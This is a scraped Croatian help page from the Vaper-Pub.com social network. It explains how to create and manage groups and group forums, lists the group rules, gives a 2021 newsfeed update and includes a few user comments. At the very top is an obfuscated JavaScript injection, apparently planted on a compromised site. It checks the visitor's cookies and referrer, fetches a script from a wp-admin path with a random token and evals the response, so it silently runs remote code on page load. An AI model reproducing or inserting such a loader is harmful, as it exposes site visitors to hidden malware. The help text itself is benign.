;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Kreirati grupu na Vaper-Pub.com

Kako kreirati grupu na Vaper-Pub.com i pravila

Kreirati grupu je jedna od osnovnih funkcija Vaper-Pub.com društvene mreže. Na taj način možete unutar same Vaper-Pub.com društvene mreže sakupiti članove koje interesira ista tema. Bez obzira o kojoj temi se radilo.

Grupu kreirate jednostavno iz svog profila. Kliknete na kotačić i zatim “Manage Groups”

Kreiranje grupa

Otvorit će vam se pregled grupa. Ukoliko ste dodani za administratora ili moderatora neke grupe – to ćete vidjeti ovdje.

Pregled i upravljanje grupama

U ovom dijelu možete izmijeniti podatke trenutnih grupa ili kreirati novu klikom na “Start Creating!”

Prozor za unos podataka o grupi

Tu unesete group info tipa ime, opis i slično. Ubacite avatar i cover te ostale elemente.

Klikom na gumb “Create Group!” grupa je spremna za svoje nove članove s vama na čelu kao administratorom.
Ona će se ujedno pojaviti i na popisu svih grupa Vaper Pub društvene mreže.
Kasnije možete u grupu, na ovom dijelu stranice, ubaciti još moderatore ili admine.

Pravila grupa

 1. Tema grupe ne smije kršiti smjernice ponašanja na društvenoj mreži.
 2. Grupe koje će imati sadržaje vezane uz političke, vjerske, rasne i nacionalne tematike će biti obrisane.
 3. Zabranjeno je otvaranje grupa sa eksplicitnim sadržajima.
 4. Zabranjeno je otvaranje grupa čija bi tema bila širenje mržnje po bilo kojoj osnovi.

Nakon što Vaper Pub kao društvena mreža zaživi. Kada vidimo da je korisnici aktivno koriste i da ima sadržaja, morat ćemo eliminirati neaktivne grupe zbog uštede resursa.

S obzirom da je sve još u fazi početka to naravno nećemo raditi, no u nekakvoj budućnosti grupe u kojima neće biti članova ili aktivnosti ćemo obrisati. Naravno prethodno tome će administrator biti obaviješten te ćemo vidjeti dal takva grupa ima smisla i možemo li kako pomoći da ona zaživi.

Administrirati grupu znači preuzeti odgovornost da ona zaživi. Morate motivirati ljude da se pridruže grupi te ih kao administrator morate potaknuti na aktivnosti i sudjelovanje u raspravama. Koji puta neće biti dovoljno samo otvoriti grupu i nadati se da će ljudi doći sami od sebe.

Ako već imate grupu sličnog sadržaja na nekim drugim društvenim mrežama – možete pozvati članove da se pridruže vašoj grupi i na ovoj društvenoj mreži. Na taj način ćete dobiti korisnike i aktivnost u grupi.

Newsfeed – 05.10.2021.

U ovom momentu Newsfeed baca objave iz svih grupa.

Postoji određeni broj korisnika koje objave iz drugih grupa čiji oni nisu član ne zanimaju. U bliskoj budućnosti ćemo omogućiti zaseban Newsfeed koji će biti u obliku linka odmah ispod “glavnog” newsfeeda. U tom newsfeedu će biti isključivo objave vaših prijatelja te grupa u kojima ste član.

Glavni Newsfeed će tada preuzeti funkciju nekakvih generalnih novosti i zbivanja na društvenoj mreži, što možda nije na odmet povremeno pogledati jer se možda baš pojavi nešto što vas interesira.

Grupe i Forum grupe

Svaka grupa ima mogućnost imati i svoj dio foruma.

Kreiranje foruma vezanog za temu grupe se radi iz dijela upravljanja grupom

Kreiranje foruma grupe
Kreiranje foruma grupe

Dakle idete na Manage Group, otvorit će vam se ovakav prozor kakav vidite gore. Koliknetre na “Enable forum for this group” i to je to. Sve što morate još je upisati generalne informacije i podatke o samom forumu.

Forum će se zatim pojaviti na listi foruma Vaper-Pub.com društvene mreže, koja se nalazi u izborniku lijevo.

otvaranje novog foruma
otvaranje novog foruma

Choose your Reaction!
 • Nisam siguran da li je na kraju otklonjen onaj problem sa administrativnim alatima u grupama?
  U Rock’n’rolla grupi kojoj sam administrator vidim da su moderatori označeni (kad odem na administroranje grupe/members),
  no u grupi Glazbenici gdje me je Tomislav postavio za moderatora, nemam dostupne nikakve alate za administriranje/moderiranje grupe.
  Ovo je bilo prijavljeno u ticvketu na korisničkoj podršci, no ticket j zatvoren a problem je očito i dalje prisutan.

 • @hsavoradmin ,imaš ovdje u ovom tekstu tipfeler: ” Koliknetre”.
  Ispada da te pratim u stopu po stranici, ali jbg, pročitam pa upadne u oko ;)

 • možda još zgodno za dodati prije kreiranja grupe – pogledati da neka slična grupa već ne postoji, čisto da se izbjegnu duplići…

  i cover slika bi trebala biti bar 1185px širine te 300px visine (najmanje) – za najbolju kvalitetu iste… izgubio sam nešto kalorija testirajući ovo :D :D

Leave a Comment